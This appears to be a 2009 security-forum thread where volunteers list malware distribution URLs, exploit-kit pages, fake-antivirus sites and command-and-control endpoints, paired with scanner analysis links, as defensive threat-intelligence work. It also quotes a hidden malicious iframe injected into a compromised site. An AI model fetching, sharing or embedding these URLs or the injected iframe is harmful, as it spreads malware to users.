hxxp://121.12.115.11:886/down/aa11a.exe
hxxp://121.12.115.11:886/down/aa12.exe
hxxp://121.12.115.11:886/down/aa13c.exe
hxxp://121.12.115.11:886/down/aa32e.exe
hxxp://121.12.115.11:886/down/aa33a.exe
hxxp://121.12.115.11:886/down/aa26d.exe
hxxp://121.12.115.11:886/down/aa27a.exe
hxxp://121.12.115.11:886/down/aa31b.exe
hxxp://121.12.115.11:886/down/aa15d.exe
hxxp://121.12.115.11:886/down/aa17.exe
hxxp://121.12.115.11:886/down/aa18a.exe
hxxp://121.12.115.11:886/down/aa19c.exe
hxxp://121.12.115.11:886/down/aa20a.exe
hxxp://121.12.115.11:886/down/aa29a.exe
hxxp://121.12.115.11:886/down/aa22.exe
hxxp://121.12.115.11:886/down/aa23a.exe
hxxp://121.12.115.11:886/down/aa24.exe
hxxp://121.12.115.11:886/down/aa25a.exe
hxxp://121.12.115.11:886/down/aa28.exe
hxxp://121.12.115.11:886/down/aa30.exe
hxxp://121.12.115.11:886/down/ms.exe
-
http://av-guard.net/?uid=102&pid=3
-
onlinegames
hxxp://www.2a8k.cn/d/51.exe
hxxp://www.2a8k.cn/d/50.exe
hxxp://www.2a8k.cn/d/29.exe
hxxp://www.2a8k.cn/d/13.exe
hxxp://www.2a8k.cn/d/24.exe
hxxp://www.2a8k.cn/d/25.exe
hxxp://www.2a8k.cn/d/35.exe
hxxp://www.2a8k.cn/d/34.exe
hxxp://www.2a8k.cn/d/33.exe
hxxp://www.2a8k.cn/d/36.exe
hxxp://www.2a8k.cn/d/42.exe
hxxp://www.2a8k.cn/d/39.exe
hxxp://www.2a8k.cn/d/43.exe
hxxp://www.2a8k.cn/d/22.exe
hxxp://www.2a8k.cn/d/23.exe
hxxp://www.2a8k.cn/d/26.exe
hxxp://www.2a8k.cn/d/27.exe
hxxp://www.2a8k.cn/d/32.exe
hxxp://www.2a8k.cn/d/28.exe
hxxp://www.2a8k.cn/d/8.exe
hxxp://www.2a8k.cn/d/21.exe
hxxp://www.2a8k.cn/d/20.exe
hxxp://www.2a8k.cn/d/11.exe
hxxp://www.2a8k.cn/d/19.exe
hxxp://www.2a8k.cn/d/10.exe
hxxp://www.2a8k.cn/d/18.exe
hxxp://www.2a8k.cn/d/9.exe
hxxp://www.2a8k.cn/d/3.exe
hxxp://www.2a8k.cn/d/4.exe
hxxp://www.2a8k.cn/d/7.exe
hxxp://www.2a8k.cn/d/2.exe
hxxp://www.2a8k.cn/d/17.exe
hxxp://www.2a8k.cn/d/16.exe
hxxp://www.2a8k.cn/d/15.exe
hxxp://www.2a8k.cn/d/14.exe
hxxp://www.2a8k.cn/d/12.exe
hxxp://www.2a8k.cn/d/1.exe
hxxp://5yttrre.cn/xx33.exe
hxxp://5yttrre.cn/xx13.exe
hxxp://5yttrre.cn/xx26.exe
hxxp://5yttrre.cn/xx27.exe
hxxp://5yttrre.cn/xx28.exe
hxxp://5yttrre.cn/xx29.exe
hxxp://5yttrre.cn/xx30.exe
hxxp://5yttrre.cn/xx31.exe
hxxp://5yttrre.cn/xx11.exe
hxxp://5yttrre.cn/xx9.exe
hxxp://5yttrre.cn/xx12.exe
hxxp://5yttrre.cn/xx14.exe
hxxp://5yttrre.cn/xx10.exe
hxxp://5yttrre.cn/xx39.exe
hxxp://5yttrre.cn/xx15.exe
hxxp://5yttrre.cn/xx32.exe
hxxp://5yttrre.cn/xx8.exe
hxxp://5yttrre.cn/xx17.exe
hxxp://5yttrre.cn/xx23.exe
hxxp://5yttrre.cn/xx20.exe
hxxp://5yttrre.cn/xx22.exe
hxxp://5yttrre.cn/xx25.exe
hxxp://5yttrre.cn/xx18.exe
hxxp://5yttrre.cn/xx19.exe
hxxp://5yttrre.cn/xx24.exe
hxxp://5yttrre.cn/xx6.exe
hxxp://5yttrre.cn/xx16.exe
hxxp://5yttrre.cn/xx3.exe
hxxp://5yttrre.cn/xx21.exe
hxxp://5yttrre.cn/xx5.exe
hxxp://5yttrre.cn/xx2.exe
hxxp://5yttrre.cn/xx4.exe
hxxp://5yttrre.cn/xx7.exe
hxxp://5yttrre.cn/xx1.exe
-
hxxp://u.987255.com/image/svchost.jpg
hxxp://u.987255.com/image/dd.jpg
hxxp://u.987255.com/image/bd.jpg
hxxp://a.05916.com:666/40.jpg
hxxp://u.987255.com/image/zy.jpg
hxxp://download.leeboo.com/Gvod15_286.exe
hxxp://download.leeboo.com/QvodSetup13_286.exe
hxxp://www.rtmmd.cn/h/5.exe
hxxp://58.215.79.176:88/b8.exe
hxxp://58.215.79.176:8080/b3.exe
hxxp://58.215.79.176:88/5.exe
hxxp://58.215.79.176:88/10.exe
hxxp://58.215.79.176:88/7.exe
hxxp://58.215.79.176:88/cpa.exe
hxxp://121.10.108.42/cj/1hqq.exe
hxxp://59.34.197.133/down/25.exe
hxxp://121.10.108.42/cj/2hqq.exe
hxxp://59.34.197.133/down/24.exe
hxxp://59.34.197.133/down/21.exe
hxxp://59.34.197.133/down/23.exe
hxxp://59.34.197.133/down/18.exe
hxxp://59.34.197.133/down/12.exe
hxxp://59.34.197.133/down/11.exe
hxxp://59.34.197.133/down/13.exe
hxxp://59.34.197.133/down/14.exe
hxxp://59.34.197.133/down/17.exe
hxxp://59.34.197.133/down/16.exe
hxxp://59.34.197.133/down/9.exe
hxxp://59.34.197.133/down/10.exe
hxxp://59.34.197.133/down/8.exe
hxxp://59.34.197.133/down/7.exe
hxxp://59.34.197.133/down/19.exe
hxxp://59.34.197.133/down/6.exe
hxxp://59.34.197.133/down/3.exe
hxxp://59.34.197.133/down/2.exe
hxxp://59.34.197.133/down/22.exe
hxxp://59.34.197.133/down/4.exe
hxxp://59.34.197.133/down/1.exe
-
FO
-
hxxp://alfafoxx.com/temp/find26.exe
hxxp://alfafoxx.com/temp/ret26.exe
hxxp://alfafoxx.com/temp/ldr26.exe
hxxp://www.alfafoxx.com/mldr/data/mbt.exe
-
Trojan:
hXXp://mediahousenamebuyvideo.cn:8080/load.php
VT 8/40
http://www.virustotal.com/sv/analisis/93a126695d599d3c50147010fe2f337155f211b8fd43256e9ec89c77e4ed84bb-1244666759
PDF:
hXXp://mediahousenamebuyvideo.cn:8080/cache/readme.pdf
VT 15/40
http://www.virustotal.com/sv/analisis/948c50b18fcd2a2f71faf6257fcddcdacfa5ed55af17ceafecced4bdd8ebab8a-1244666624
Flash:
hXXp://mediahousenamebuyvideo.cn:8080/cache/flash.swf
VT 22/39
http://www.virustotal.com/sv/analisis/8fa7088e7dae6ff5f9c4f5eaff14de22e2198b28946472486a5045e44d0d5b5d-1244666646
-
banker
hxxp://71.174.51.86/images/logout.jpg
-
jenesaisrien.com:8080/load.php
vds659.sivit.org:8080/load.php
shopmoviefestival.cn:8080/load.php
s72-38-121-90.static.comm.cgocable.net:8080/load.php
static-86-94.is.net.pl:8080/load.php
s15238535.onlinehome-server.info:8080/load.php
tweetwitter.com:8080/load.php
gianttopdiscover.cn:8080/load.php
247orders.com:8080/load.php
4-job.com:8080/load.php
server.edwinbuckley.co.uk:8080/load.php
infostore.ca:8080/load.php
roleski.pl:8080/load.php
wtssurvey.com:8080/load.php
findabigrig.cn:8080/load.php
shopmovieproduction.cn:8080/load.php
fancystarlight.com:8080/load.php
lomianki.com:8080/load.php
thegeekdude.com:8080/load.php
theadsensekid.com:8080/load.php
thehomename.cn:8080/load.php
eszafiry.com:8080/load.php
mlodapara.com:8080/load.php
obraczki.com:8080/load.php
readymixbet.cn:8080/load.php
namemartfilmlife.cn:8080/index.php
xbuzzer.com:8080/load.php
spigotinch.com:8080/load.php
smsconnectnow.com:8080/load.php
numberingcite.com:8080/load.php
typicalprecedent.com:8080/load.php
findyourbigidea.cn:8080/load.php
findbigthinkers.cn:8080/load.php
bigskytopguide.cn:8080/load.php
michaelsbestway2findalawyer.cn:8080/load.php
hugetopseek.cn:8080/load.php
VirusTotal (http://www.virustotal.com/analisis/01f8a46219acc32a149b4707bca32dfcca1d88fd794a27266a8f071a2845aea2-1244687707)
ThreatExpert (http://www.threatexpert.com/report.aspx?md5=fae47a0d3048e1609c253994ea368e79)
hxxp://78.109.29.116/new/controller.php?action=bot&entity_list=&uid=1&first=1&guid=13441600&rnd=981633
-
redirects by telemedia.m77s[.]cn:
Wepawet (http://wepawet.iseclab.org/view.php?hash=d33a97ac078bb1833726bfcfbe9b9650&t=1244705876&type=js)
exploits:
f97q.cn/images/index.php
Wepawet (http://wepawet.cs.ucsb.edu/view.php?type=js&hash=9b458aab745351364b38a99f25e11da7&t=1244704241)
pdf:
f97q.cn/images/spl/pdf.pdf
Wepawet (http://wepawet.iseclab.org/view.php?hash=d0cb3cb6a3061e3a2c7e0ce31f5bb788&t=1244706026&type=js)
trojan:
f97q.cn/images/exe.php
VirusTotal (http://www.virustotal.com/analisis/612022bd60334f8b1b79d5887d5515fda41cda55340bfd9f516ae041f89a519a-1244561761) - 6/40 (15.00%)
Anubis (http://anubis.iseclab.org/?action=result&task_id=1fb5448a0ba130c0445cee1879e067d03&format=html)
From ANUBIS:1032 to 78.109.25.217:80 - [r99u.cn]
Request: GET /myl/464664.php?id=470261258&v=101&tm=33&b=9671316727
Response: 200 "OK"
Request: GET /myl/exe/loader.exe
Response: 200 "OK"
-
Trojan:
fer5woi.ru/1t.exe
Trojan:
dirtylivesex.net/fuflo_v1.exe
http://www.virustotal.com/analisis/4784550551e642a6f133bfec4877af63a801d48f01e7fa6c33378abf1ed167e9-1244732363
Trojan:
rezident77.ru/files/s66.exe
http://www.virustotal.com/analisis/403f79bd1e23384be42728583872ba6eb43621db55c7a7aaea242f79938f8f24-1244732262
Exploits:
domainzzoom.ru/in.php
http://wepawet.iseclab.org/view.php?hash=dacf686bc48b5f9aec70cc8cbc6b248e&t=1244731801&type=js
PDF:
domainzzoom.ru/pdf.php
fake AV:
domainzzoom.ru/load.php?id=2
http://www.virustotal.com/analisis/d1c8dea9489502866622d1d45d0a0fe80eb06ede51b32484711416a96cd1df1f-1244731949
fake payment site:
securebillingsoftware.com/buy.php?affid=03500
-
redirects:
thelotmachine.cn:8080/in.cgi
thenetnameshop.cn:8080/in.cgi
compoundcapitolgroup.cn:8080/in.cgi
mixlotworld.cn:8080/in.cgi
superlottry.cn:8080/in.cgi
webnamemart.cn:8080/in.cgi
payloads:
adsl.141.255.0.72.maskatel.ca:8080/load.php
bunchguide.cn:8080/load.php
bigtopfindsite.cn:8080/load.php
bigtopfindsite.cn:8080/cache/readme.pdf
bigtopfindsite.cn:8080/cache/flash.swf
filmlifeimages.cn:8080/load.php
filmlifeimages.cn:8080/cache/readme.pdf
filmlifeimages.cn:8080/cache/flash.swf
findbigshots.cn:8080/load.php
findbigshots.cn:8080/cache/readme.pdf
findbigshots.cn:8080/cache/flash.swf
giantpremium.cn:8080/load.php
giantpremium.cn:8080/cache/readme.pdf
giantpremium.cn:8080/cache/flash.swf
gianttopnano.cn:8080/load.php
gianttopnano.cn:8080/cache/readme.pdf
gianttopnano.cn:8080/cache/flash.swf
mediahomenameshopmovie.cn:8080/load.php
mediahomenameshopmovie.cn:8080/cache/readme.pdf
mediahomenameshopmovie.cn:8080/cache/flash.swf
nameshopinternational.cn:8080/load.php
nameshopinternational.cn:8080/cache/readme.pdf
nameshopinternational.cn:8080/cache/flash.swf
newnetnameshop.cn:8080/load.php
newnetnameshop.cn:8080/cache/readme.pdf
newnetnameshop.cn:8080/cache/flash.swf
shopmovielife.cn:8080/load.php
shopmovielife.cn:8080/cache/readme.pdf
shopmovielife.cn:8080/cache/flash.swf
yournameshop.cn:8080/load.php
yournameshop.cn:8080/cache/readme.pdf
yournameshop.cn:8080/cache/flash.swf
exe:
http://www.virustotal.com/analisis/25db455ed35b759dc3a6924359bd72c37f9cc3b13edac98a96894e344d45078d-1244797876
http://anubis.iseclab.org/?action=result&task_id=1c7642f4324780a04014ee1900012c257
pdf:
http://wepawet.iseclab.org/view.php?hash=d21d612330db155dcbd75191a9b7c021&t=1244801268&type=js
flash:
http://wepawet.iseclab.org/view.php?hash=3e05fc4fd1c7a49f8478da9c76c7c435&type=swf
http://www.virustotal.com/analisis/8fa7088e7dae6ff5f9c4f5eaff14de22e2198b28946472486a5045e44d0d5b5d-1244133184
http://www.threatexpert.com/report.aspx?md5=7264e961f25beaa201906e4086caa1ce
-
http://nyfilmlife.cn:8080/index.php
leads to:
http://gianttoplocate.cn:8080/load.php?id=0
http://gianttoplocate.cn:8080/load.php?id=1
http://nyfilmlife.cn:8080/cache/readme.pdf
http://nyfilmlife.cn:8080/cache/flash.swf
http://gianttoplocate.cn:8080/landig.php?id=4
-
FO
-
Fake AV:
pornotube912.com/scan/
Trojan:
194.33.180.41/rferfref5.exe
http://www.virustotal.com/analisis/5859892e44a0ab804ea7ec37b6313f089e2f47d87ee83c3528e84ccdea35e4a8-1245048501
Exploits:
rtm-books.co.uk/ad/index.php
http://wepawet.iseclab.org/view.php?hash=7bba4edc1abb1608785379e50afad535&t=1245048299&type=js
PDF:
rtm-books.co.uk/ad/include/two.pdf
Trojan:
rtm-books.co.uk/ad/load.php
http://www.virustotal.com/analisis/4a92f221548e9c84903ab15ec49281ffd16f0c74ee4e075bbaab48f6dbeb8c19-1245048374
Exploits:
viva-delpinata2.com/2/index.php
http://wepawet.iseclab.org/view.php?hash=cf45d657fe06a83f99b2d6518f4714ca&t=1245048311&type=js
PDF:
viva-delpinata2.com/2/notTheoryCites.pdf
Flash:
viva-delpinata2.com/2/normalLeap.swf
Trojan:
viva-delpinata2.com/2/update.php
http://www.virustotal.com/analisis/3b21cb087180f5d3cc067d9fd8198b745635130038aa5587d7e3b1f4e9ee37c8-1245022898
-
New Rogue sites
protectionsystem.org
protectionsystemlab.com/psystem.exe
Core-guard-antivirus.com
fullguardlab.com
fullprotect.org
http://gosoonscan.com/?uid=13002
http://planscan4.info/download/install.php
http://ina4id.com/download/InternetAntivirusPro.exe
http://ina4id.com/download/file.exe
-
AV downloader
joomlaprojects.cn/file.exe
http://www.virustotal.com/analisis/a56d5fcf47517f96978014bee0d1ca5a67be4d9d2725643c9f91e947f2d48c1e-1245081896
Fake AV:
antivirus-2009-ppro.com/cgi-bin/download.pl?code=0000282
http://www.virustotal.com/analisis/078c85cd91583f821aaf3d8c5588785fab192d32ae09a7fad5da0f45e668e2c7-1245082096
joomlaprojects.cn/install.exe
http://www.virustotal.com/analisis/7f041ff1df6e693585fdf1c5be1fb39c2de3d1c0f358ae35612c48da39ebbda9-1245082461
haos-in.ru/3_install.exe
http://www.virustotal.com/analisis/c60c9f6772c6416c366783b5edf8c96b619fcd86bdafdcb737bcd388cd7d668c-1245084099
Fake payment sites:
advanced-virusremover2009.com/buy/?code?code=0000282
https://www.securebillingsoftware.com/buy.php?affid=05100 (works with https only)
Trojan:
onuka.cn/dll/em.txt
http://www.virustotal.com/analisis/d979c2f805ce2e01d21e49aad39e3ff0f2aa7e98c86b0e5671a7c4868bfa5640-1245082890
Trojan:
218.6.12.82/winrar.exe
http://www.virustotal.com/analisis/b687f6673db5072334cb6a13f6d59f303cf3302258939b93403fb26bbae6e984-1245083262
-
redirects:
globalmixgroup.cn:8080/in.cgi
payloads:
bigbestlite.cn:8080/load.php
bigbestlite.cn:8080/cache/readme.pdf
bigbestlite.cn:8080/cache/flash.swf
bigtopfestival.cn:8080/load.php
bigtopfestival.cn:8080/cache/readme.pdf
bigtopfestival.cn:8080/cache/flash.swf
mixbetonline.cn:8080/load.php
mixbetonline.cn:8080/cache/readme.pdf
mixbetonline.cn:8080/cache/flash.pdf
themixbet.cn:8080/load.php
themixbet.cn:8080/cache/readme.pdf
themixbet.cn:8080/cache/flash.swf
VirusTotal (http://www.virustotal.com/analisis/e85beb2ea40aac707863221ce5189863288583550453b5ad3c19aa31aa2c6f9a-1245076415): 1/40
ThreatExpert (http://www.threatexpert.com/report.aspx?md5=9e95cda3645f97fab3235ac21a625a2a)
-
Trojans:
almasto.net/ins.exe
biggerz.net/ins.exe
Camposceola.com/ins.exe
http://www.virustotal.com/analisis/33c3518f7555aa7b407570e8174133563621629ff2ff8e3c468ffca8da703f3b-1245123021
almasto.net/sdfsdf.exe
http://www.virustotal.com/analisis/3e9314888ad11497839781d9a4c9325e36caf86d59bc1ac7ece987e9c56a777b-1245122926
friendslinks.com/0/new.exe
http://www.virustotal.com/analisis/68fbe09bcbe4464d9644a57444d9e94f43fd04a2fe42a35ab0f0274cbf14f9ce-1245121971
xz.ub9.net/winres.exe
http://www.virustotal.com/analisis/396abb55f933c0df23e78582f5b13738bb799d260618959998f0245c058704f3-1245123148
heyjoy.cn/612.exe
http://www.virustotal.com/analisis/652c1cff90096824647b2377b4850fb47f4b6f6abe470eb0114f51d9de86a2a6-1245123263
Exploits:
almasto.net/lnk.php?embedded=false
http://wepawet.cs.ucsb.edu/view.php?hash=27262e8c3f678960412e6ecd940ccd3f&t=1245109604&type=js
Fake AV downloader:
friendslinks.com/0/loyalbox.exe
http://www.virustotal.com/analisis/776c883badde97f0577d6b11eb759ea9f85302a96d79f4446d3eb4e4399051a0-1245122144
porno-tube-xxx.us/loader/index.php?userid=id_0079
http://www.virustotal.com/analisis/26e35006830b010d1d7c97541f1cf960e3b9e8d4d611e5b991132c1634fe92c2-1245122608
Fake AV:
you-adult-tube.co.cc/setup.exe
http://www.virustotal.com/analisis/f2dd78517405edeeacc4b06eab567a54e54b9306d18f02ed620a55cb45abbcbd-1245122729
gives koobface related malware links:
upr15may.com/ld/gen.php
-
FO
-
yag0yag0.co.cc/index2.php
wepawet seems to fail on this one.
http://jsunpack.jeek.org/dec/go?url=yag0yag0.co.cc_new_index2.php
flash:
yag0yag0.co.cc/new/i.swf
http://wepawet.cs.ucsb.edu/view.php?hash=8fdc5af28af58910fedd022b60bd40f2&type=swf
Trojan:
yag0yag0.co.cc/new/img.php
http://www.virustotal.com/analisis/40515c53fea41dcbf7aa7342dda135ee981781500d7b9c6750e9204a5f8ce091-1245293368
-
Fake AV:
ameraif.cn
amayrex.cn
adiosma.cn
ameycva.cn
apauzy.cn
securitytoolsworld.com
K00bface:
niceshoot89.com/software/04f456eca8/30000/1/Setup.exe
http://www.virustotal.com/analisis/33ee8d94223dc222cb5a4358f5ab4366dd3c4eeb43d2a7d2a2a3905c4e36cb25-1245307967
-
Koobface:
nicevideo18.net/software/ea2faf7008/11400/1/Setup.exe
Exploits:
adultfex.com/lb/index.php
http://wepawet.iseclab.org/view.php?hash=ffcb0d874f69382bc4e54caf0b450406&t=1245563029&type=js
PDF:
adultfex.com/lb/humourAlwaysHumour.pdf
Flash:
adultfex.com/lb/usesHumour.swf
Trojan:
adultfex.com/lb/update.php
http://www.virustotal.com/analisis/4718ef3d0a751e94ce3a0e20385283d995ee82136e9638892eaf6bbc4795a3e5-1245563087
Trojans:
slil.ru/27769294/2fcdca20.4a3e7138/adware_crypt.exe
http://www.virustotal.com/analisis/0a08059aeaa955de3f5d08546f28c83db855d761082c4205811819195e185b04-1245566730
freshdownloadcenter.com/install.48232.exe
http://www.virustotal.com/analisis/debf5446d9ed6394fa72bb78f52e4e6ccffe0e4ec8960a3b7c0a2e92a714c369-1245566838
www.adult-you-tube.info/downloads/setup.exe
http://www.virustotal.com/analisis/38700a97d35bf78118d3c48d5f37a9150c18d194de58adb43dc6da27942bfc6b-1245567493
72.9.108.26/install_10.exe
http://www.virustotal.com/analisis/186ef67fadf42ac6eaee2b5d26a093e9adef6178caa8b42bd3f825405892c4c8-1245567635
adwareindependence.com/ppc/f494.exe
http://www.virustotal.com/analisis/b5006cc39bf7a7ff6a1b71c6d9033f67657cffae429ae34bc01b3c2f42ea7157-1245567981
Fake AV (Malware Doctor):
adwareindependence.com/scan/mlw.exe
http://www.virustotal.com/analisis/bfc294ae9aa0da8fd65544bdea740fc48b94b1608c7f9d99e6092153dd2029cd-1245567989
Fake payment site:
secure.best-internet-payments.com/cgi-bin/nph-pr/pandora/softcore/buy_soft.php?productid=malwaredoc01&advert=494
malware calls home (receives malware links when given the right parameters):
softwaresense-search.com/stat.php
-
Exploits:
sterlate.com
http://wepawet.iseclab.org/view.php?hash=f74e05ee99c0e925663a3451f1d85f34&t=1245570059&type=js
PDF:
sterlate.com/cache/readme.pdf
Flash:
sterlate.com/cache/flash.swf
(downloaded malware is offline)
Exploits:
sterlate.com/sng/index.php
http://wepawet.iseclab.org/view.php?hash=d78519f72f81a626f04873713067717f&t=1245651339&type=js
PDF:
sterlate.com/sng/cache/readme.pdf
Flash:
sterlate.com/sng/cache/flash.swf
http://wepawet.iseclab.org/view.php?hash=253639a3e73fff185fbd4c489ab0335b&type=swf
Trojan:
sterlate.com/sng/load.php?id=5
http://www.virustotal.com/analisis/a8ed3a72616d4d87020d37d7d2b90e2fcc32a5133d535d091970998fe39cd129-1245411696
Exploits (wepawet fails on this one):
forum.sc00d.cn/index.php
http://jsunpack.jeek.org/dec/go?url=forum.sc00d.cn_index.php
PDF:
forum.sc00d.cn/pdf.php?id=11
Trojan:
forum.sc00d.cn/load.php?id=11&spl=4
http://www.virustotal.com/analisis/ff60d4703813e84c5237c95aa0f0c52295945c8f76f03152fa4dd6972e1b3263-1245649899
Trojans:
nsmercuryplanet.ru/dast.exe
http://www.virustotal.com/analisis/7d515de9754257b6d5cbc05682bb7d82d2d7c92786f51bb9fecd291f64ad6739-1245649810
gold-smerch.cn/flash.exe
http://www.virustotal.com/analisis/140a5961f36bd6a2645f77e74defd8985084f6a6fed6592920aba48eb511ea7d-1245649827
Malware calls home:
bytecode.biz/stats/in.php
-
More rogue sites:
Internetware-safe.com
Kingpinservers.info
Mal-warexls.net
http://youravprotection.com/support
http://www.registerantivirus.com/
http://www.avprotectionstat.com/index.php
-
hXXp://ribboninn.com/djellow.exe
[VT 5/41]
http://www.virustotal.com/sv/analisis/3a93b168267d7ddc8c034303b817e0ea297a000df40761bb7f5a79faa68bb295-1245847100
-
Another site, same file as above
http://76380.webhosting29.1blu.de/djellow.exe
-
New binary and URL
http://www.hzcpwl.cn/djellow.exe
[VT 6/41]
http://www.virustotal.com/sv/analisis/2b27e47c7f8d2195d5473d400a1e4ccec79049c6d84203e27003e5e2daaa95b7-1245924902
-
http://transein.com/_test_01-07/getexe.php
[VT 5/41]
http://www.virustotal.com/sv/analisis/7d168c70d66f83b9876c31227af4e595b5d40ea03df6a624f8669c2cddb9661f-1245929271
-
http://213.182.197.42/load.php
[VT 10/41]
http://www.virustotal.com/sv/analisis/2cc7714f5b1d89fd90aa73df48f1770f1e7222553fe1955542ca82194f114d18-1245941662
PDF
http://213.182.197.42/pdf.php
[VT 10/41]
http://www.virustotal.com/sv/analisis/0ce86e1f37aa5fd6651a2d40bf9b3c3d9dce6859a4fabf0e72fdff2de42a1f1d-1245941687
Flash
http://213.182.197.42/swf.php
[VT 9/41]
http://www.virustotal.com/sv/analisis/ff04bb1c9f9b2d20ec22cabbd6c7d6e382762961080440a9418731a4b05be15d-1245941702
-
Trojans:
satanic.easycoding.org/file.exe
http://www.virustotal.com/analisis/eb70c986ee061898ce2c23e2b37a92a65458f0744aebe2e4e7838a70023cafec-1245985908
keule557.cn/2.exe
http://www.virustotal.com/analisis/0bb0fab4f476de542bcae7b8338793e705d4bbaad2511210e94958784e45aec3-1245985956
keule557.cn/805.exe
http://www.virustotal.com/analisis/d1ab115a3b62876adcbd571be2be685e1af1672f506b8a084e52308fc5dbdcd9-1245985980
usrvnu.ru/infect.php
http://www.virustotal.com/analisis/b7b4f921db11b06919834a8f8b2c96efabe8d6919da067ea011d736e37c2187e-1245986114
roons.cn/ded/Project2.exe
http://www.virustotal.com/analisis/d07e34d88fa067fe1d942670df0dad29e555fd5841a19f46d47dd56f50f74be5-1245986217
Trojan Pinch:
woons.cn/pinch_no_cript.exe
-
zbot
http://javiercubel.com/statement_45365352.exe
[VT 9/41]
http://www.virustotal.com/sv/analisis/046d3796c3dc4620f2c54c6439f11a5f4dd3faf4d513ed0dcb9f640780009022-1246020252
-
Zbot
http://update.microsoft.com.hillij.com/microsoftofficeupdate/isapdl/default.aspx/officexp-KB910721-FullFile-ENU.exe
[VT 13/41]
http://www.virustotal.com/sv/analisis/b6c9a2125a43133d681be0e27aac281f404e29b5e6f031d04a789ff6f0bc8218-1246048421
-
PSW Trojan Fun:
http://winddk.ch.ma/dd.txt
Leads to:
http://ztb.cztv.tv/360/1.exe
http://ztb.cztv.tv/360/2.exe
http://ztb.cztv.tv/360/7.exe
http://ztb.cztv.tv/360/88.exe
http://ztb.cztv.tv/360/9.exe
Been a while since I visited. Hope all is well with everyone! ;)
-
http://artmarket.or.kr/ecard.exe
[VT 6/41]
http://www.virustotal.com/sv/analisis/89e12bf34116897c63b6e1a98a328e16222f33dab4b2aee2400c60aa3e7a1aaf-1246197175
-
195.190.13.106 / Cutwail
hxxp://109438129432.cn/load.php
VirusTotal (http://www.virustotal.com/analisis/a1275ed1572e9eed052ebbcadaec941df6b0fccac2990a993ad32227bbc1ca4b-1244801070) - 23/40 (57.50%)
hxxp://234273849543.cn/load.php
VirusTotal (http://www.virustotal.com/analisis/a1275ed1572e9eed052ebbcadaec941df6b0fccac2990a993ad32227bbc1ca4b-1244801070) - 23/40 (57.50%)
hxxp://438723847234.cn/load.php
VirusTotal (http://www.virustotal.com/analisis/ce5ce251673ad3b9a00a8d3e3216d0435802c072f3e3460f9046c015a8eac075-1245938186) - 12/41 (29.27%)
ThreatExpert (http://www.threatexpert.com/report.aspx?md5=c05177060951769a260d29186dd978e2)
--
61.235.123.140
exploits / trojan
hxxp://witsibux.cn/hi/index.php
hxxp://witsibux.cn/hi/update.php
hxxp://witsibux.cn/hi/belowNotH.pdf
hxxp://witsibux.cn/hi/humourOf.swf
Wepawet (http://wepawet.iseclab.org/view.php?hash=a284924f3529a5d4d08b4e09a2453194&t=1246209781&type=js)
VirusTotal (http://www.virustotal.com/analisis/14d44d74e33ce1caeaf523632c346ec70b86767dec196b5d66ef87b77b08bde4-1246209825) - 2/41 (4.88%)
-
Some more fun:
-
hxxp://dcvs.chc.edu.tw/classfix/default.asp (Mal/Iframe-I)
-
Can you double check that one please? (hostname is failing to resolve from several locations over here)
-
liesbethmilan.be/1/captcha6.exe
liesbethmilan.be/1/ms.19.exe
-
FO
-
Can you double check that one please? (hostname is failing to resolve from several locations over here)
Add a www to it or Google the domain name, but there is more than just that one and I can't see where any exploits popped out. ???
After the closing html tag, I see the following:
<iframe src=http://www.3prince.com/kmdr/guest/images/_vti_cnf/tt/rp.htm width=30 height=0><div style="position: absolute; top: -999px;left: -999px;">
[heading text garbled by encoding]:
<a href="http://www.kryiyi.com">[anchor text garbled by encoding]</a>
<a href="http://www.61hj.com">[anchor text garbled by encoding]</a>
<a href="http://www.reeltop.com">[anchor text garbled by encoding]</a>
<a href="http://www.941fc.com">[anchor text garbled by encoding]</a>
<a href="http://www.ddoscc.cn">DDOS [garbled], CC [garbled]</a>
<a href="http://www.10004y.cn">[anchor text garbled by encoding]</a>
<a href="http://www.gfsj.org.cn">[anchor text garbled by encoding]</a>
<a href="http://www.3ky.org.cn">DDOS [garbled] DDOS [garbled] DDOS [garbled] ddos [garbled] IP [garbled]</a>
<a href="http://1104f.cn">[anchor text garbled by encoding]</a>
</div>
The iframed URL returns HTTP status code 404. I guess this is where the exploits came from.
Most of the hosts resolve to 61.160.213.47, except for
w ww.941fc.com (NXDOMAIN)
w ww.ddoscc.cn (CNAME url.xundns.net -> 120.72.34.251)
w ww.10004y.cn (58.252.208.172)
w ww.ddoscc.cn returns:
HTTP/1.1 200 OK
Date: Mon, 29 Jun 2009 13:53:57 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 64
Content-Type: text/html
Set-Cookie: ASPSESSIONIDCATCSDAA=DAOPAKFAOJEIFGHFMGKLFDLD; path=/
Cache-control: private
<meta http-equiv="refresh" content="0;url=http://ddoscc.cn">
ddoscc.cn again resolves to 61.160.213.47.
Trying to access these hosts on 61.160.213.47 always ends with the connection being interrupted/reset by the server.
w ww.10004y.cn does not contain anything malicious from a quick look.
-
Pinch:
turbina.net/modules/w/load/exec.php
http://www.virustotal.com/analisis/2cb4599b35deaacebdb1746918564ace0ebb0560e0fc7d7e9e14703bcd8590ea-1246346258
Emold:
nat77.biz/123.exe
http://www.virustotal.com/analisis/1b379fc266bf6ea59a945d77b54a4945c39012020739e90a621d8c21a6b4c62a-1246348304
iframecash.net/cache/bin/main.exe
http://www.virustotal.com/analisis/9fcdcd460db594f5143457b2c52acbe509fb2abefb713e77f2d91e0184aa8888-1246348532
Fake AV:
pornotube915.com/scan
Trojans:
hzone66.cn/preloader_9.exe
http://www.virustotal.com/analisis/beb6f3ed69235697bcbc018198fb0228d683da9a9a2943984b3b3ba7431b328d-1246333025
niph-kosova.org/server3.exe
http://www.virustotal.com/analisis/a5fd40f7a8c7686f68ead6219ed842e129f6200c70cb4d5e61d1f8de35cf5d5c-1246346783
91.189.113.210/t.exe
http://www.virustotal.com/analisis/4452581e37cb7aedcfc68d937988785cd6d55a938f267b4beb87f1227cbb2db3-1246347754
79.174.64.36/ldr.exe
http://www.virustotal.com/analisis/05cdd3f1b6a8a8ba47391b5506ef1fbddd361f85bf24d54887c48eae2eb28cba-1246347842
casinousa.cn/lsass.exe
http://www.virustotal.com/analisis/324b639b727842e2b6854915ea7cc5018fba336386a9773720e4520abb701751-1246347934
winsofter.ru/out.exe
http://www.virustotal.com/analisis/14bd1b39cc6c4e23ce4a2ebc5e94676e850e0a91caf03af8d1ab3e6dcc9377c7-1246348063
missing-codecs.net/download/install_flash_player.exe
http://www.virustotal.com/analisis/c90303b43ad53fb5a223a72d13256bf9175cd63013053ce5f4de4de4a8eaef0c-1246350478
Exploits (wepawet and jsunpack fail on this):
svazkusavip.com/counter/index.php
PDF:
